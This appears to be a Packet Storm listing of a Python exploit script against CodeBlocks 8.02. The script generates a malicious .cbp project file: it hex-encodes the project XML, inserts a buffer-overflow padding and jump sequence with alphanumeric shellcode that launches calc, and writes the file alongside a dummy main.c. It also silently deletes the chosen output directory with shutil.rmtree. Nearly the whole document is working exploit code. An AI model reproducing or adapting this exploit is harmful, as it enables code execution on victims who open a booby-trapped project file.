CodeBlocks version 8.02 buffer overflow exploit that creates a malicious .cbp file.
739ce0e230f72ba41ac2e7dae6c8bba4d781c615f90e609c4ca79fef95873e28#!/usr/bin/python
import sys,os,shutil
if len(sys.argv) != 3:
print "------------------------------------------------"
print "CodeBlocks (cbp) Buffer Overflow Exploit "
print "Usage : exploit.py <project_name> <path>"
print "Example : exploit.py sploit_proj c:\proj\\ "
print "By : sup3r "
print "------------------------------------------------"
sys.exit(0)
name = sys.argv[1]
path = sys.argv[2]
header1=(
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20"
"\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x73\x74\x61"
"\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\x79\x65\x73\x22\x20\x3f\x3e\x0a\x3c\x43\x6f"
"\x64\x65\x42\x6c\x6f\x63\x6b\x73\x5f\x70\x72\x6f\x6a\x65\x63\x74\x5f\x66\x69\x6c"
"\x65\x3e\x0a\x09\x3c\x46\x69\x6c\x65\x56\x65\x72\x73\x69\x6f\x6e\x20\x6d\x61\x6a"
"\x6f\x72\x3d\x22\x31\x22\x20\x6d\x69\x6e\x6f\x72\x3d\x22\x36\x22\x20\x2f\x3e\x0a"
"\x09\x3c\x50\x72\x6f\x6a\x65\x63\x74\x3e\x0a\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e"
"\x20\x74\x69\x74\x6c\x65\x3d\x22"+name+"\x22\x20\x2f\x3e\x0a\x09\x09\x3c\x4f"
"\x70\x74\x69\x6f\x6e\x20\x70\x63\x68\x5f\x6d\x6f\x64\x65\x3d\x22\x32\x22\x20\x2f"
"\x3e\x0a\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f\x6d\x70\x69\x6c\x65\x72"
"\x3d\x22\x67\x63\x63\x22\x20\x2f\x3e\x0a\x09\x09\x3c\x42\x75\x69\x6c\x64\x3e\x0a"
"\x09\x09\x09\x3c\x54\x61\x72\x67\x65\x74\x20\x74\x69\x74\x6c\x65\x3d\x22\x44\x65"
"\x62\x75\x67\x22\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x6f\x75"
"\x74\x70\x75\x74\x3d\x22")
header2=(
"\x22\x20\x70\x72\x65\x66\x69\x78\x5f\x61\x75\x74\x6f\x3d\x22\x31\x22\x20\x65\x78"
"\x74\x65\x6e\x73\x69\x6f\x6e\x5f\x61\x75\x74\x6f\x3d\x22\x31\x22\x20\x2f\x3e\x0a"
"\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x6f\x62\x6a\x65\x63\x74\x5f\x6f"
"\x75\x74\x70\x75\x74\x3d\x22\x6f\x62\x6a\x5c\x44\x65\x62\x75\x67\x5c\x22\x20\x2f"
"\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x74\x79\x70\x65\x3d\x22"
"\x31\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f"
"\x6d\x70\x69\x6c\x65\x72\x3d\x22\x67\x63\x63\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09"
"\x3c\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x09\x09\x09\x3c\x41\x64\x64"
"\x20\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d\x67\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09"
"\x3c\x2f\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x09\x3c\x2f\x54\x61\x72"
"\x67\x65\x74\x3e\x0a\x09\x09\x09\x3c\x54\x61\x72\x67\x65\x74\x20\x74\x69\x74\x6c"
"\x65\x3d\x22\x52\x65\x6c\x65\x61\x73\x65\x22\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70"
"\x74\x69\x6f\x6e\x20\x6f\x75\x74\x70\x75\x74\x3d\x22\x62\x69\x6e\x5c\x52\x65\x6c"
"\x65\x61\x73\x65\x5c"+name+"\x22\x20\x70\x72\x65\x66\x69\x78\x5f\x61\x75\x74"
"\x6f\x3d\x22\x31\x22\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x5f\x61\x75\x74\x6f"
"\x3d\x22\x31\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20"
"\x6f\x62\x6a\x65\x63\x74\x5f\x6f\x75\x74\x70\x75\x74\x3d\x22\x6f\x62\x6a\x5c\x52"
"\x65\x6c\x65\x61\x73\x65\x5c\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74"
"\x69\x6f\x6e\x20\x74\x79\x70\x65\x3d\x22\x31\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09"
"\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f\x6d\x70\x69\x6c\x65\x72\x3d\x22\x67\x63"
"\x63\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e"
"\x0a\x09\x09\x09\x09\x09\x3c\x41\x64\x64\x20\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d"
"\x4f\x32\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x2f\x43\x6f\x6d\x70\x69\x6c\x65"
"\x72\x3e\x0a\x09\x09\x09\x09\x3c\x4c\x69\x6e\x6b\x65\x72\x3e\x0a\x09\x09\x09\x09"
"\x09\x3c\x41\x64\x64\x20\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d\x73\x22\x20\x2f\x3e"
"\x0a\x09\x09\x09\x09\x3c\x2f\x4c\x69\x6e\x6b\x65\x72\x3e\x0a\x09\x09\x09\x3c\x2f"
"\x54\x61\x72\x67\x65\x74\x3e\x0a\x09\x09\x3c\x2f\x42\x75\x69\x6c\x64\x3e\x0a\x09"
"\x09\x3c\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x09\x3c\x41\x64\x64\x20"
"\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d\x57\x61\x6c\x6c\x22\x20\x2f\x3e\x0a\x09\x09"
"\x3c\x2f\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x3c\x55\x6e\x69\x74\x20"
"\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x6d\x61\x69\x6e\x2e\x63\x22\x3e\x0a\x09"
"\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f\x6d\x70\x69\x6c\x65\x72\x56\x61"
"\x72\x3d\x22\x43\x43\x22\x20\x2f\x3e\x0a\x09\x09\x3c\x2f\x55\x6e\x69\x74\x3e\x0a"
"\x09\x09\x3c\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x73\x3e\x0a\x09\x09\x09\x3c\x63"
"\x6f\x64\x65\x5f\x63\x6f\x6d\x70\x6c\x65\x74\x69\x6f\x6e\x20\x2f\x3e\x0a\x09\x09"
"\x09\x3c\x64\x65\x62\x75\x67\x67\x65\x72\x20\x2f\x3e\x0a\x09\x09\x3c\x2f\x45\x78"
"\x74\x65\x6e\x73\x69\x6f\x6e\x73\x3e\x0a\x09\x3c\x2f\x50\x72\x6f\x6a\x65\x63\x74"
"\x3e\x0a\x3c\x2f\x43\x6f\x64\x65\x42\x6c\x6f\x63\x6b\x73\x5f\x70\x72\x6f\x6a\x65"
"\x63\x74\x5f\x66\x69\x6c\x65\x3e\x0a")
c_file=(
"#include <stdio.h>\n"
"#include <stdlib.h>\n\n"
"int main()\n"
"{\r\n"
" printf(\"Don't compile \");\n"
" return 0;\n"
"}\r\n")
#calc shellcode -> 375 bytes
shellcode=(
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIvSkymS8iKnKizNkipta"
"4XtckmQ2SuCZMwgQQrVK3zKKL8bJTVqioWuCFZMR79Z4sN1mLEmqcz5WfLnimlbTOkz7YhM"
"TVLjgORFvCiZQgVcUvmQxo71MCmQS2ZJxVlK1kjLZuoZOrZvPC2EBRnxL28JWY9YTVLjdPP"
"f5KvjimNRTKSpompftKYZ47UVMNeMrrxiZtppx6MYMLvaCvrHjwvYqj2FV7rmKMOm6khlKM"
"OuUOMzCOQvNwl1T6xmwgKzUNZqQXRPMPNmaQo8Nnpnn77Jq6k5pilYJ4mNQojymXqwvyUFO"
"ytJPtq0vzNn7gw1CFtJA")
payload = header1
payload += "\x41"*(4072-len(path))
payload += "\x74\x06\x41\x41"
payload += "xp"
payload += "\x30\x71"
payload += "\x61"*169
payload += "\x41"*111
payload += shellcode
payload += "\x61"*(6720-len(shellcode))
payload += header2
try:
shutil.rmtree(path)
except os.error:
pass
try:
os.mkdir(path)
cbp = open(path+name+'.cbp', 'w')
cbp.write(payload)
cbp.close()
main = open(path+'main.c', 'w')
main.write(c_file)
raw_input("[x] Exploit project created!")
except:
print "Error!"
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed